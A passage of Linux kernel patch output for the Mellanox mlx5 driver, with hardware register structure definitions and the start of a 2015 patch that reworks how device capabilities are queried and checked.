height_grade_type[0x4]; + u8 height_grade[0x18]; + + u8 
height_dz[0x10]; + u8 height_dv[0x10]; + + u8 reserved_4[0x10]; + u8 height_sigma[0x10]; + + u8 reserved_5[0x20]; + + u8 reserved_6[0x4]; + u8 phase_grade_type[0x4]; + u8 phase_grade[0x18]; + + u8 reserved_7[0x8]; + u8 phase_eo_pos[0x8]; + u8 reserved_8[0x8]; + u8 phase_eo_neg[0x8]; + + u8 ffe_set_tested[0x10]; + u8 test_errors_per_lane[0x10]; +}; + +struct mlx5_ifc_pvlc_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x1c]; + u8 vl_hw_cap[0x4]; + + u8 reserved_3[0x1c]; + u8 vl_admin[0x4]; + + u8 reserved_4[0x1c]; + u8 vl_operational[0x4]; +}; + +struct mlx5_ifc_pude_reg_bits { + u8 swid[0x8]; + u8 local_port[0x8]; + u8 reserved_0[0x4]; + u8 admin_status[0x4]; + u8 reserved_1[0x4]; + u8 oper_status[0x4]; + + u8 reserved_2[0x60]; +}; + +struct mlx5_ifc_ptys_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0xd]; + u8 proto_mask[0x3]; + + u8 reserved_2[0x40]; + + u8 eth_proto_capability[0x20]; + + u8 ib_link_width_capability[0x10]; + u8 ib_proto_capability[0x10]; + + u8 reserved_3[0x20]; + + u8 eth_proto_admin[0x20]; + + u8 ib_link_width_admin[0x10]; + u8 ib_proto_admin[0x10]; + + u8 reserved_4[0x20]; + + u8 eth_proto_oper[0x20]; + + u8 ib_link_width_oper[0x10]; + u8 ib_proto_oper[0x10]; + + u8 reserved_5[0x20]; + + u8 eth_proto_lp_advertise[0x20]; + + u8 reserved_6[0x60]; +}; + +struct mlx5_ifc_ptas_reg_bits { + u8 reserved_0[0x20]; + + u8 algorithm_options[0x10]; + u8 reserved_1[0x4]; + u8 repetitions_mode[0x4]; + u8 num_of_repetitions[0x8]; + + u8 grade_version[0x8]; + u8 height_grade_type[0x4]; + u8 phase_grade_type[0x4]; + u8 height_grade_weight[0x8]; + u8 phase_grade_weight[0x8]; + + u8 gisim_measure_bits[0x10]; + u8 adaptive_tap_measure_bits[0x10]; + + u8 ber_bath_high_error_threshold[0x10]; + u8 ber_bath_mid_error_threshold[0x10]; + + u8 ber_bath_low_error_threshold[0x10]; + u8 one_ratio_high_threshold[0x10]; + + u8 one_ratio_high_mid_threshold[0x10]; + u8 one_ratio_low_mid_threshold[0x10]; + + u8 one_ratio_low_threshold[0x10]; + u8 ndeo_error_threshold[0x10]; + + u8 mixer_offset_step_size[0x10]; + u8 reserved_2[0x8]; + u8 mix90_phase_for_voltage_bath[0x8]; + + u8 mixer_offset_start[0x10]; + u8 mixer_offset_end[0x10]; + + u8 reserved_3[0x15]; + u8 ber_test_time[0xb]; +}; + +struct mlx5_ifc_pspa_reg_bits { + u8 swid[0x8]; + u8 local_port[0x8]; + u8 sub_port[0x8]; + u8 reserved_0[0x8]; + + u8 reserved_1[0x20]; +}; + +struct mlx5_ifc_pqdr_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x5]; + u8 prio[0x3]; + u8 reserved_2[0x6]; + u8 mode[0x2]; + + u8 reserved_3[0x20]; + + u8 reserved_4[0x10]; + u8 min_threshold[0x10]; + + u8 reserved_5[0x10]; + u8 max_threshold[0x10]; + + u8 reserved_6[0x10]; + u8 mark_probability_denominator[0x10]; + + u8 reserved_7[0x60]; +}; + +struct mlx5_ifc_ppsc_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x60]; + + u8 reserved_3[0x1c]; + u8 wrps_admin[0x4]; + + u8 reserved_4[0x1c]; + u8 wrps_status[0x4]; + + u8 reserved_5[0x8]; + u8 up_threshold[0x8]; + u8 reserved_6[0x8]; + u8 down_threshold[0x8]; + + u8 reserved_7[0x20]; + + u8 reserved_8[0x1c]; + u8 srps_admin[0x4]; + + u8 reserved_9[0x1c]; + u8 srps_status[0x4]; + + u8 reserved_10[0x40]; +}; + +struct mlx5_ifc_pplr_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x8]; + u8 lb_cap[0x8]; + u8 reserved_3[0x8]; + u8 lb_en[0x8]; +}; + +struct mlx5_ifc_pplm_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 
reserved_1[0x10]; + + u8 reserved_2[0x20]; + + u8 port_profile_mode[0x8]; + u8 static_port_profile[0x8]; + u8 active_port_profile[0x8]; + u8 reserved_3[0x8]; + + u8 retransmission_active[0x8]; + u8 fec_mode_active[0x18]; + + u8 reserved_4[0x20]; +}; + +struct mlx5_ifc_ppcnt_reg_bits { + u8 swid[0x8]; + u8 local_port[0x8]; + u8 pnat[0x2]; + u8 reserved_0[0x8]; + u8 grp[0x6]; + + u8 clr[0x1]; + u8 reserved_1[0x1c]; + u8 prio_tc[0x3]; + + union mlx5_ifc_eth_cntrs_grp_data_layout_auto_bits counter_set; +}; + +struct mlx5_ifc_ppad_reg_bits { + u8 reserved_0[0x3]; + u8 single_mac[0x1]; + u8 reserved_1[0x4]; + u8 local_port[0x8]; + u8 mac_47_32[0x10]; + + u8 mac_31_0[0x20]; + + u8 reserved_2[0x40]; +}; + +struct mlx5_ifc_pmtu_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 max_mtu[0x10]; + u8 reserved_2[0x10]; + + u8 admin_mtu[0x10]; + u8 reserved_3[0x10]; + + u8 oper_mtu[0x10]; + u8 reserved_4[0x10]; +}; + +struct mlx5_ifc_pmpr_reg_bits { + u8 reserved_0[0x8]; + u8 module[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0x18]; + u8 attenuation_5g[0x8]; + + u8 reserved_3[0x18]; + u8 attenuation_7g[0x8]; + + u8 reserved_4[0x18]; + u8 attenuation_12g[0x8]; +}; + +struct mlx5_ifc_pmpe_reg_bits { + u8 reserved_0[0x8]; + u8 module[0x8]; + u8 reserved_1[0xc]; + u8 module_status[0x4]; + + u8 reserved_2[0x60]; +}; + +struct mlx5_ifc_pmpc_reg_bits { + u8 module_state_updated[32][0x8]; +}; + +struct mlx5_ifc_pmlpn_reg_bits { + u8 reserved_0[0x4]; + u8 mlpn_status[0x4]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 e[0x1]; + u8 reserved_2[0x1f]; +}; + +struct mlx5_ifc_pmlp_reg_bits { + u8 rxtx[0x1]; + u8 reserved_0[0x7]; + u8 local_port[0x8]; + u8 reserved_1[0x8]; + u8 width[0x8]; + + u8 lane0_module_mapping[0x20]; + + u8 lane1_module_mapping[0x20]; + + u8 lane2_module_mapping[0x20]; + + u8 lane3_module_mapping[0x20]; + + u8 reserved_2[0x160]; +}; + +struct mlx5_ifc_pmaos_reg_bits { + u8 reserved_0[0x8]; + u8 module[0x8]; + u8 reserved_1[0x4]; + u8 admin_status[0x4]; + u8 reserved_2[0x4]; + u8 oper_status[0x4]; + + u8 ase[0x1]; + u8 ee[0x1]; + u8 reserved_3[0x1c]; + u8 e[0x2]; + + u8 reserved_4[0x40]; +}; + +struct mlx5_ifc_plpc_reg_bits { + u8 reserved_0[0x4]; + u8 profile_id[0xc]; + u8 reserved_1[0x4]; + u8 proto_mask[0x4]; + u8 reserved_2[0x8]; + + u8 reserved_3[0x10]; + u8 lane_speed[0x10]; + + u8 reserved_4[0x17]; + u8 lpbf[0x1]; + u8 fec_mode_policy[0x8]; + + u8 retransmission_capability[0x8]; + u8 fec_mode_capability[0x18]; + + u8 retransmission_support_admin[0x8]; + u8 fec_mode_support_admin[0x18]; + + u8 retransmission_request_admin[0x8]; + u8 fec_mode_request_admin[0x18]; + + u8 reserved_5[0x80]; +}; + +struct mlx5_ifc_plib_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x8]; + u8 ib_port[0x8]; + + u8 reserved_2[0x60]; +}; + +struct mlx5_ifc_plbf_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0xd]; + u8 lbf_mode[0x3]; + + u8 reserved_2[0x20]; +}; + +struct mlx5_ifc_pipg_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 dic[0x1]; + u8 reserved_2[0x19]; + u8 ipg[0x4]; + u8 reserved_3[0x2]; +}; + +struct mlx5_ifc_pifr_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0xe0]; + + u8 port_filter[8][0x20]; + + u8 port_filter_update_en[8][0x20]; +}; + +struct mlx5_ifc_pfcc_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 ppan[0x4]; + u8 reserved_2[0x4]; + u8 prio_mask_tx[0x8]; + u8 reserved_3[0x8]; + u8 
prio_mask_rx[0x8]; + + u8 pptx[0x1]; + u8 aptx[0x1]; + u8 reserved_4[0x6]; + u8 pfctx[0x8]; + u8 reserved_5[0x10]; + + u8 pprx[0x1]; + u8 aprx[0x1]; + u8 reserved_6[0x6]; + u8 pfcrx[0x8]; + u8 reserved_7[0x10]; + + u8 reserved_8[0x80]; +}; + +struct mlx5_ifc_pelc_reg_bits { + u8 op[0x4]; + u8 reserved_0[0x4]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 op_admin[0x8]; + u8 op_capability[0x8]; + u8 op_request[0x8]; + u8 op_active[0x8]; + + u8 admin[0x40]; + + u8 capability[0x40]; + + u8 request[0x40]; + + u8 active[0x40]; + + u8 reserved_2[0x80]; +}; + +struct mlx5_ifc_peir_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 reserved_2[0xc]; + u8 error_count[0x4]; + u8 reserved_3[0x10]; + + u8 reserved_4[0xc]; + u8 lane[0x4]; + u8 reserved_5[0x8]; + u8 error_type[0x8]; +}; + +struct mlx5_ifc_pcap_reg_bits { + u8 reserved_0[0x8]; + u8 local_port[0x8]; + u8 reserved_1[0x10]; + + u8 port_capability_mask[4][0x20]; +}; + +struct mlx5_ifc_paos_reg_bits { + u8 swid[0x8]; + u8 local_port[0x8]; + u8 reserved_0[0x4]; + u8 admin_status[0x4]; + u8 reserved_1[0x4]; + u8 oper_status[0x4]; + + u8 ase[0x1]; + u8 ee[0x1]; + u8 reserved_2[0x1c]; + u8 e[0x2]; + + u8 reserved_3[0x40]; +}; + +struct mlx5_ifc_pamp_reg_bits { + u8 reserved_0[0x8]; + u8 opamp_group[0x8]; + u8 reserved_1[0xc]; + u8 opamp_group_type[0x4]; + + u8 start_index[0x10]; + u8 reserved_2[0x4]; + u8 num_of_indices[0xc]; + + u8 index_data[18][0x10]; +}; + +struct mlx5_ifc_lane_2_module_mapping_bits { + u8 reserved_0[0x6]; + u8 rx_lane[0x2]; + u8 reserved_1[0x6]; + u8 tx_lane[0x2]; + u8 reserved_2[0x8]; + u8 module[0x8]; +}; + +struct mlx5_ifc_bufferx_reg_bits { + u8 reserved_0[0x6]; + u8 lossy[0x1]; + u8 epsb[0x1]; + u8 reserved_1[0xc]; + u8 size[0xc]; + + u8 xoff_threshold[0x10]; + u8 xon_threshold[0x10]; +}; + +struct mlx5_ifc_set_node_in_bits { + u8 node_description[64][0x8]; +}; + +struct mlx5_ifc_register_power_settings_bits { + u8 reserved_0[0x18]; + u8 power_settings_level[0x8]; + + u8 reserved_1[0x60]; +}; + +struct mlx5_ifc_register_host_endianness_bits { + u8 he[0x1]; + u8 reserved_0[0x1f]; + + u8 reserved_1[0x60]; +}; + +struct mlx5_ifc_umr_pointer_desc_argument_bits { + u8 reserved_0[0x20]; + + u8 mkey[0x20]; + + u8 addressh_63_32[0x20]; + + u8 addressl_31_0[0x20]; +}; + +struct mlx5_ifc_ud_adrs_vector_bits { + u8 dc_key[0x40]; + + u8 ext[0x1]; + u8 reserved_0[0x7]; + u8 destination_qp_dct[0x18]; + + u8 static_rate[0x4]; + u8 sl_eth_prio[0x4]; + u8 fl[0x1]; + u8 mlid[0x7]; + u8 rlid_udp_sport[0x10]; + + u8 reserved_1[0x20]; + + u8 rmac_47_16[0x20]; + + u8 rmac_15_0[0x10]; + u8 tclass[0x8]; + u8 hop_limit[0x8]; + + u8 reserved_2[0x1]; + u8 grh[0x1]; + u8 reserved_3[0x2]; + u8 src_addr_index[0x8]; + u8 flow_label[0x14]; + + u8 rgid_rip[16][0x8]; +}; + +struct mlx5_ifc_pages_req_event_bits { + u8 reserved_0[0x10]; + u8 function_id[0x10]; + + u8 num_pages[0x20]; + + u8 reserved_1[0xa0]; +}; + +struct mlx5_ifc_eqe_bits { + u8 reserved_0[0x8]; + u8 event_type[0x8]; + u8 reserved_1[0x8]; + u8 event_sub_type[0x8]; + + u8 reserved_2[0xe0]; + + union mlx5_ifc_event_auto_bits event_data; + + u8 reserved_3[0x10]; + u8 signature[0x8]; + u8 reserved_4[0x7]; + u8 owner[0x1]; +}; + +enum { + MLX5_CMD_QUEUE_ENTRY_TYPE_PCIE_CMD_IF_TRANSPORT = 0x7, +}; + +struct mlx5_ifc_cmd_queue_entry_bits { + u8 type[0x8]; + u8 reserved_0[0x18]; + + u8 input_length[0x20]; + + u8 input_mailbox_pointer_63_32[0x20]; + + u8 input_mailbox_pointer_31_9[0x17]; + u8 reserved_1[0x9]; + + u8 command_input_inline_data[16][0x8]; + + u8 
command_output_inline_data[16][0x8]; + + u8 output_mailbox_pointer_63_32[0x20]; + + u8 output_mailbox_pointer_31_9[0x17]; + u8 reserved_2[0x9]; + + u8 output_length[0x20]; + + u8 token[0x8]; + u8 signature[0x8]; + u8 reserved_3[0x8]; + u8 status[0x7]; + u8 ownership[0x1]; +}; + +struct mlx5_ifc_cmd_out_bits { + u8 status[0x8]; + u8 reserved_0[0x18]; + + u8 syndrome[0x20]; + + u8 command_output[0x20]; +}; + +struct mlx5_ifc_cmd_in_bits { + u8 opcode[0x10]; + u8 reserved_0[0x10]; + + u8 reserved_1[0x10]; + u8 op_mod[0x10]; + + u8 command[0][0x20]; +}; + +struct mlx5_ifc_cmd_if_box_bits { + u8 mailbox_data[512][0x8]; + + u8 reserved_0[0x180]; + + u8 next_pointer_63_32[0x20]; + + u8 next_pointer_31_10[0x16]; + u8 reserved_1[0xa]; + + u8 block_number[0x20]; + + u8 reserved_2[0x8]; + u8 token[0x8]; + u8 ctrl_signature[0x8]; + u8 signature[0x8]; +}; + +struct mlx5_ifc_mtt_bits { + u8 ptag_63_32[0x20]; + + u8 ptag_31_8[0x18]; + u8 reserved_0[0x6]; + u8 wr_en[0x1]; + u8 rd_en[0x1]; +}; + +enum { + MLX5_INITIAL_SEG_NIC_INTERFACE_FULL_DRIVER = 0x0, + MLX5_INITIAL_SEG_NIC_INTERFACE_DISABLED = 0x1, + MLX5_INITIAL_SEG_NIC_INTERFACE_NO_DRAM_NIC = 0x2, +}; + +enum { + MLX5_INITIAL_SEG_NIC_INTERFACE_SUPPORTED_FULL_DRIVER = 0x0, + MLX5_INITIAL_SEG_NIC_INTERFACE_SUPPORTED_DISABLED = 0x1, + MLX5_INITIAL_SEG_NIC_INTERFACE_SUPPORTED_NO_DRAM_NIC = 0x2, +}; + +enum { + MLX5_INITIAL_SEG_HEALTH_SYNDROME_FW_INTERNAL_ERR = 0x1, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_DEAD_IRISC = 0x7, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_HW_FATAL_ERR = 0x8, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_FW_CRC_ERR = 0x9, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_ICM_FETCH_PCI_ERR = 0xa, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_ICM_PAGE_ERR = 0xb, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_ASYNCHRONOUS_EQ_BUF_OVERRUN = 0xc, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_EQ_IN_ERR = 0xd, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_EQ_INV = 0xe, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_FFSER_ERR = 0xf, + MLX5_INITIAL_SEG_HEALTH_SYNDROME_HIGH_TEMP_ERR = 0x10, +}; + +struct mlx5_ifc_initial_seg_bits { + u8 fw_rev_minor[0x10]; + u8 fw_rev_major[0x10]; + + u8 cmd_interface_rev[0x10]; + u8 fw_rev_subminor[0x10]; + + u8 reserved_0[0x40]; + + u8 cmdq_phy_addr_63_32[0x20]; + + u8 cmdq_phy_addr_31_12[0x14]; + u8 reserved_1[0x2]; + u8 nic_interface[0x2]; + u8 log_cmdq_size[0x4]; + u8 log_cmdq_stride[0x4]; + + u8 command_doorbell_vector[0x20]; + + u8 reserved_2[0xf00]; + + u8 initializing[0x1]; + u8 reserved_3[0x4]; + u8 nic_interface_supported[0x3]; + u8 reserved_4[0x18]; + + struct mlx5_ifc_health_buffer_bits health_buffer; + + u8 no_dram_nic_offset[0x20]; + + u8 reserved_5[0x6e40]; + + u8 reserved_6[0x1f]; + u8 clear_int[0x1]; + + u8 health_syndrome[0x8]; + u8 health_counter[0x18]; + + u8 reserved_7[0x17fc0]; +}; + +union mlx5_ifc_ports_control_registers_document_bits { + struct mlx5_ifc_bufferx_reg_bits bufferx_reg; + struct mlx5_ifc_eth_2819_cntrs_grp_data_layout_bits eth_2819_cntrs_grp_data_layout; + struct mlx5_ifc_eth_2863_cntrs_grp_data_layout_bits eth_2863_cntrs_grp_data_layout; + struct mlx5_ifc_eth_3635_cntrs_grp_data_layout_bits eth_3635_cntrs_grp_data_layout; + struct mlx5_ifc_eth_802_3_cntrs_grp_data_layout_bits eth_802_3_cntrs_grp_data_layout; + struct mlx5_ifc_eth_extended_cntrs_grp_data_layout_bits eth_extended_cntrs_grp_data_layout; + struct mlx5_ifc_eth_per_prio_grp_data_layout_bits eth_per_prio_grp_data_layout; + struct mlx5_ifc_eth_per_traffic_grp_data_layout_bits eth_per_traffic_grp_data_layout; + struct mlx5_ifc_lane_2_module_mapping_bits lane_2_module_mapping; + struct 
mlx5_ifc_pamp_reg_bits pamp_reg; + struct mlx5_ifc_paos_reg_bits paos_reg; + struct mlx5_ifc_pcap_reg_bits pcap_reg; + struct mlx5_ifc_peir_reg_bits peir_reg; + struct mlx5_ifc_pelc_reg_bits pelc_reg; + struct mlx5_ifc_pfcc_reg_bits pfcc_reg; + struct mlx5_ifc_phys_layer_cntrs_bits phys_layer_cntrs; + struct mlx5_ifc_pifr_reg_bits pifr_reg; + struct mlx5_ifc_pipg_reg_bits pipg_reg; + struct mlx5_ifc_plbf_reg_bits plbf_reg; + struct mlx5_ifc_plib_reg_bits plib_reg; + struct mlx5_ifc_plpc_reg_bits plpc_reg; + struct mlx5_ifc_pmaos_reg_bits pmaos_reg; + struct mlx5_ifc_pmlp_reg_bits pmlp_reg; + struct mlx5_ifc_pmlpn_reg_bits pmlpn_reg; + struct mlx5_ifc_pmpc_reg_bits pmpc_reg; + struct mlx5_ifc_pmpe_reg_bits pmpe_reg; + struct mlx5_ifc_pmpr_reg_bits pmpr_reg; + struct mlx5_ifc_pmtu_reg_bits pmtu_reg; + struct mlx5_ifc_ppad_reg_bits ppad_reg; + struct mlx5_ifc_ppcnt_reg_bits ppcnt_reg; + struct mlx5_ifc_pplm_reg_bits pplm_reg; + struct mlx5_ifc_pplr_reg_bits pplr_reg; + struct mlx5_ifc_ppsc_reg_bits ppsc_reg; + struct mlx5_ifc_pqdr_reg_bits pqdr_reg; + struct mlx5_ifc_pspa_reg_bits pspa_reg; + struct mlx5_ifc_ptas_reg_bits ptas_reg; + struct mlx5_ifc_ptys_reg_bits ptys_reg; + struct mlx5_ifc_pude_reg_bits pude_reg; + struct mlx5_ifc_pvlc_reg_bits pvlc_reg; + struct mlx5_ifc_slrg_reg_bits slrg_reg; + struct mlx5_ifc_sltp_reg_bits sltp_reg; + u8 reserved_0[0x60e0]; +}; + +union mlx5_ifc_debug_enhancements_document_bits { + struct mlx5_ifc_health_buffer_bits health_buffer; + u8 reserved_0[0x200]; +}; + +union mlx5_ifc_uplink_pci_interface_document_bits { + struct mlx5_ifc_initial_seg_bits initial_seg; + u8 reserved_0[0x20060]; }; #endif /* MLX5_IFC_H */ diff --git a/include/linux/mlx5/qp.h b/include/linux/mlx5/qp.h index 310b5f7fd6ae..f079fb1a31f7 100644 --- a/include/linux/mlx5/qp.h +++ b/include/linux/mlx5/qp.h @@ -134,13 +134,21 @@ enum { enum { MLX5_WQE_CTRL_CQ_UPDATE = 2 << 2, + MLX5_WQE_CTRL_CQ_UPDATE_AND_EQE = 3 << 2, MLX5_WQE_CTRL_SOLICITED = 1 << 1, }; enum { + MLX5_SEND_WQE_DS = 16, MLX5_SEND_WQE_BB = 64, }; +#define MLX5_SEND_WQEBB_NUM_DS (MLX5_SEND_WQE_BB / MLX5_SEND_WQE_DS) + +enum { + MLX5_SEND_WQE_MAX_WQEBBS = 16, +}; + enum { MLX5_WQE_FMR_PERM_LOCAL_READ = 1 << 27, MLX5_WQE_FMR_PERM_LOCAL_WRITE = 1 << 28, @@ -200,6 +208,23 @@ struct mlx5_wqe_ctrl_seg { #define MLX5_WQE_CTRL_WQE_INDEX_MASK 0x00ffff00 #define MLX5_WQE_CTRL_WQE_INDEX_SHIFT 8 +enum { + MLX5_ETH_WQE_L3_INNER_CSUM = 1 << 4, + MLX5_ETH_WQE_L4_INNER_CSUM = 1 << 5, + MLX5_ETH_WQE_L3_CSUM = 1 << 6, + MLX5_ETH_WQE_L4_CSUM = 1 << 7, +}; + +struct mlx5_wqe_eth_seg { + u8 rsvd0[4]; + u8 cs_flags; + u8 rsvd1; + __be16 mss; + __be32 rsvd2; + __be16 inline_hdr_sz; + u8 inline_hdr_start[2]; +}; + struct mlx5_wqe_xrc_seg { __be32 xrc_srqn; u8 rsvd[12]; From 938fe83c8dcbbf294d167e6163200a8540ae43c4 Mon Sep 17 00:00:00 2001 From: Saeed Mahameed Date: Thu, 28 May 2015 22:28:41 +0300 Subject: [PATCH 495/872] net/mlx5_core: New device capabilities handling - Query all supported types of dev caps on driver load. - Store the Cap data outbox per cap type into driver private data. - Introduce new Macros to access/dump stored caps (using the auto generated data types). - Obsolete SW representation of dev caps (no need for SW copy for each cap). - Modify IB driver to use new macros for checking caps. Signed-off-by: Saeed Mahameed Signed-off-by: Amir Vadai Signed-off-by: David S. 
Miller --- drivers/infiniband/hw/mlx5/cq.c | 8 +- drivers/infiniband/hw/mlx5/mad.c | 2 +- drivers/infiniband/hw/mlx5/main.c | 113 ++++++------- drivers/infiniband/hw/mlx5/mlx5_ib.h | 6 +- drivers/infiniband/hw/mlx5/mr.c | 3 +- drivers/infiniband/hw/mlx5/odp.c | 47 +++--- drivers/infiniband/hw/mlx5/qp.c | 84 +++++----- drivers/infiniband/hw/mlx5/srq.c | 7 +- drivers/net/ethernet/mellanox/mlx5/core/eq.c | 4 +- drivers/net/ethernet/mellanox/mlx5/core/fw.c | 90 ++++++---- .../net/ethernet/mellanox/mlx5/core/main.c | 154 ++++++------------ .../ethernet/mellanox/mlx5/core/mlx5_core.h | 10 +- drivers/net/ethernet/mellanox/mlx5/core/uar.c | 7 +- include/linux/mlx5/device.h | 66 +++++++- include/linux/mlx5/driver.h | 58 +------ 15 files changed, 310 insertions(+), 349 deletions(-) diff --git a/drivers/infiniband/hw/mlx5/cq.c b/drivers/infiniband/hw/mlx5/cq.c index 4e88b18cf62e..e2bea9ab93b3 100644 --- a/drivers/infiniband/hw/mlx5/cq.c +++ b/drivers/infiniband/hw/mlx5/cq.c @@ -753,7 +753,7 @@ struct ib_cq *mlx5_ib_create_cq(struct ib_device *ibdev, int entries, return ERR_PTR(-EINVAL); entries = roundup_pow_of_two(entries + 1); - if (entries > dev->mdev->caps.gen.max_cqes) + if (entries > (1 << MLX5_CAP_GEN(dev->mdev, log_max_cq_sz))) return ERR_PTR(-EINVAL); cq = kzalloc(sizeof(*cq), GFP_KERNEL); @@ -920,7 +920,7 @@ int mlx5_ib_modify_cq(struct ib_cq *cq, u16 cq_count, u16 cq_period) int err; u32 fsel; - if (!(dev->mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_CQ_MODER)) + if (!MLX5_CAP_GEN(dev->mdev, cq_moderation)) return -ENOSYS; in = kzalloc(sizeof(*in), GFP_KERNEL); @@ -1075,7 +1075,7 @@ int mlx5_ib_resize_cq(struct ib_cq *ibcq, int entries, struct ib_udata *udata) int uninitialized_var(cqe_size); unsigned long flags; - if (!(dev->mdev->caps.gen.flags & MLX5_DEV_CAP_FLAG_RESIZE_CQ)) { + if (!MLX5_CAP_GEN(dev->mdev, cq_resize)) { pr_info("Firmware does not support resize CQ\n"); return -ENOSYS; } @@ -1084,7 +1084,7 @@ int mlx5_ib_resize_cq(struct ib_cq *ibcq, int entries, struct ib_udata *udata) return -EINVAL; entries = roundup_pow_of_two(entries + 1); - if (entries > dev->mdev->caps.gen.max_cqes + 1) + if (entries > (1 << MLX5_CAP_GEN(dev->mdev, log_max_cq_sz)) + 1) return -EINVAL; if (entries == ibcq->cqe + 1) diff --git a/drivers/infiniband/hw/mlx5/mad.c b/drivers/infiniband/hw/mlx5/mad.c index 9cf9a37bb5ff..f2d9e70818d7 100644 --- a/drivers/infiniband/hw/mlx5/mad.c +++ b/drivers/infiniband/hw/mlx5/mad.c @@ -129,7 +129,7 @@ int mlx5_query_ext_port_caps(struct mlx5_ib_dev *dev, u8 port) packet_error = be16_to_cpu(out_mad->status); - dev->mdev->caps.gen.ext_port_cap[port - 1] = (!err && !packet_error) ? + dev->mdev->port_caps[port - 1].ext_port_cap = (!err && !packet_error) ? 
MLX_EXT_PORT_CAP_FLAG_EXTENDED_PORT_INFO : 0; out: diff --git a/drivers/infiniband/hw/mlx5/main.c b/drivers/infiniband/hw/mlx5/main.c index 57c9809e8b87..9075649f30fc 100644 --- a/drivers/infiniband/hw/mlx5/main.c +++ b/drivers/infiniband/hw/mlx5/main.c @@ -66,15 +66,13 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, struct ib_device_attr *props) { struct mlx5_ib_dev *dev = to_mdev(ibdev); + struct mlx5_core_dev *mdev = dev->mdev; struct ib_smp *in_mad = NULL; struct ib_smp *out_mad = NULL; - struct mlx5_general_caps *gen; int err = -ENOMEM; int max_rq_sg; int max_sq_sg; - u64 flags; - gen = &dev->mdev->caps.gen; in_mad = kzalloc(sizeof(*in_mad), GFP_KERNEL); out_mad = kmalloc(sizeof(*out_mad), GFP_KERNEL); if (!in_mad || !out_mad) @@ -96,18 +94,18 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, IB_DEVICE_PORT_ACTIVE_EVENT | IB_DEVICE_SYS_IMAGE_GUID | IB_DEVICE_RC_RNR_NAK_GEN; - flags = gen->flags; - if (flags & MLX5_DEV_CAP_FLAG_BAD_PKEY_CNTR) + + if (MLX5_CAP_GEN(mdev, pkv)) props->device_cap_flags |= IB_DEVICE_BAD_PKEY_CNTR; - if (flags & MLX5_DEV_CAP_FLAG_BAD_QKEY_CNTR) + if (MLX5_CAP_GEN(mdev, qkv)) props->device_cap_flags |= IB_DEVICE_BAD_QKEY_CNTR; - if (flags & MLX5_DEV_CAP_FLAG_APM) + if (MLX5_CAP_GEN(mdev, apm)) props->device_cap_flags |= IB_DEVICE_AUTO_PATH_MIG; props->device_cap_flags |= IB_DEVICE_LOCAL_DMA_LKEY; - if (flags & MLX5_DEV_CAP_FLAG_XRC) + if (MLX5_CAP_GEN(mdev, xrc)) props->device_cap_flags |= IB_DEVICE_XRC; props->device_cap_flags |= IB_DEVICE_MEM_MGT_EXTENSIONS; - if (flags & MLX5_DEV_CAP_FLAG_SIG_HAND_OVER) { + if (MLX5_CAP_GEN(mdev, sho)) { props->device_cap_flags |= IB_DEVICE_SIGNATURE_HANDOVER; /* At this stage no support for signature handover */ props->sig_prot_cap = IB_PROT_T10DIF_TYPE_1 | @@ -116,7 +114,7 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, props->sig_guard_cap = IB_GUARD_T10DIF_CRC | IB_GUARD_T10DIF_CSUM; } - if (flags & MLX5_DEV_CAP_FLAG_BLOCK_MCAST) + if (MLX5_CAP_GEN(mdev, block_lb_mc)) props->device_cap_flags |= IB_DEVICE_BLOCK_MULTICAST_LOOPBACK; props->vendor_id = be32_to_cpup((__be32 *)(out_mad->data + 36)) & @@ -126,37 +124,38 @@ static int mlx5_ib_query_device(struct ib_device *ibdev, memcpy(&props->sys_image_guid, out_mad->data + 4, 8); props->max_mr_size = ~0ull; - props->page_size_cap = gen->min_page_sz; - props->max_qp = 1 << gen->log_max_qp; - props->max_qp_wr = gen->max_wqes; - max_rq_sg = gen->max_rq_desc_sz / sizeof(struct mlx5_wqe_data_seg); - max_sq_sg = (gen->max_sq_desc_sz - sizeof(struct mlx5_wqe_ctrl_seg)) / - sizeof(struct mlx5_wqe_data_seg); + props->page_size_cap = 1ull << MLX5_CAP_GEN(mdev, log_pg_sz); + props->max_qp = 1 << MLX5_CAP_GEN(mdev, log_max_qp); + props->max_qp_wr = 1 << MLX5_CAP_GEN(mdev, log_max_qp_sz); + max_rq_sg = MLX5_CAP_GEN(mdev, max_wqe_sz_rq) / + sizeof(struct mlx5_wqe_data_seg); + max_sq_sg = (MLX5_CAP_GEN(mdev, max_wqe_sz_sq) - + sizeof(struct mlx5_wqe_ctrl_seg)) / + sizeof(struct 